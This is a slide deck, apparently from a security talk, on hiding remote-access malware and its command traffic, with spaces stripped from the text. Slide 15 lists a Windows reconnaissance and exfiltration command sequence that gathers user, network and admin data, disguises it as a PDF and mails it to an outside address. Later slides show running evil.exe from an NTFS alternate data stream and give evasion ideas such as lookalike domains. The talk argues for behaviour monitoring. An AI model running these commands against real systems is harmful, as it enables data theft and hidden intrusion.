This document discusses techniques for hiding malicious software and command and control traffic in plain sight. It describes designing a RAT that uses encryption and queries web pages for commands. It also discusses mimicking normal user behavior by monitoring traffic rates and target URLs. Additional hiding techniques explored include using alternate data streams, least significant bit encoding in images, and abusing network protocols. The document emphasizes that behavior monitoring must be part of security strategies to detect such concealed threats.

1. HidinginPlainSight
Presentedby /RobGillen @argodev
Thisworkislicensedundera .
Thistalkandrelatedresourcesareavailableonline:
CreativeCommonsAttribution4.0InternationalLicense
https://github.com/argodev/talks/

2. Disclaimer
Thecontentofthispresentationrepresentsmypersonalviews
andthoughtsatthepresenttime.Ireservetherighttochange
myviewsandopinionsatanytime.Thiscontentisnotendorsed
by,orrepresentativeinanywayofmyemployernorisit
intendedtobeaviewintomyworkorareflectiononthetype
ofworkthatIormygroupperforms.Itissimplyahobbyand
personalinterestandshouldbeconsideredassuch.

4. HTDCS
HelpdeskTicketDrivenCyberSecurity

7. Overview
RATDesign
Encryption
Command/Control(C2)
AntiVirus
Behavior

8. RATDesign
Exeisdroppedviainfectedpage
Querieswebpageforcommands
Performscommandsifnotdonepreviously
Periodicallypollsfornewcommands

9. Encryption
ComplexEncryptionistrivial
PBKDF–Scryptsequentialmemory-hardfunction
Manyiterations(>10K)
Longkey-lengths

10. EncryptionExample
Aboveconfigurationiscustom-hardwareresistant
Takesapproximately¼secondperguess

11. Command/Control
UseWeb2CApproach
Commandsare“issued”enmassevianormal,benignlooking
webpages
Commonports
LeveragesexistingHTML/serverconstructs

15. CommandText
ipconfig /all > %APPDATA%info.txt
net start >> %APPDATA%info.txt
tasklist /v >> %APPDATA%info.txt
net user >> %APPDATA%info.txt
net localgroup administrators >> %APPDATA%info.txt
netstat -ano >> %APPDATA%info.txt
net use >> %APPDATA%info.txt
copy %APPDATA%info.txt %APPDATA%output.pdf
del %APPDATA%info.txt
sendmail %APPDATA%output.pdf Status Update
“Jones, William E. wejones@yourorg.gov”
itebaffe-836@yopmail.com smtp.yourorg.gov
del %APPDATA%output.pdf

16. MimicUserBehavior
TrafficRates
Monitorincoming/outgoingnetworktrafficforXdays
ConfigurexfiltostaywithinX%of“normal”
C2
Exponential/randomizedstand-down
Onlycommduringperiodsofactivity

17. MimicUserBehavior
TargetURLs
Monitoroutgoingwebqueries/URLsforXdays
Usesimilardomainnamesformalicioustraffic
Appendsimilar/samequerystringstomaliciousrequests

18. HidinginLogs
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com

19. OtherHidingTechniques
OfficeFilecontentembedding
Creativelocation
AlternateDataStreams
LeastSignificantBit
NetworkProtocolManipulation

26. CreativeFileLocations

27. AlternateDataStreams
FeatureofNTFSsinceNT3.5.1
Usedformetadataandcompatibilitywithotherfilesystems

28. SoWhat?
#notepad pcast-nitrd-report-2010.pdf:secret.txt

29. Whataboutthis?
#type evil.exe > notepad.exe:evil.exe
#start notepad.exe:evil.exe

30. CrudeImageStego:LSB
LeastSignificantBit–alteritandencodemessageacross
LSBthroughvariousbytes
Visuallyimperceptible
Computationallychallengingtodetect
Encryptionalsoanoption

31. LSB:HowItWorks

32. CarrierImage
ImageData:
Size:2.1MB
Dimensions:
3500x2343px
Resolution:300dpi
BitDepth:24
~8Megapixel
“Secret”Message:
Welcome!Remember,
thingsaren’talways
whattheyseem.

35. LSBBlowUp

37. NetworkProtocolAbuse

38. Challengesof
Signature-BasedTools

42. NextSteps
Knowwhatyoucanandcan’tsee
Considerimplicationsofyourmonitoringstrategy
Behavior*must*playarole

43. Questions/Contact
RobGillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev
Thistalkandrelatedresourcesareavailableonline:
https://github.com/argodev/talks/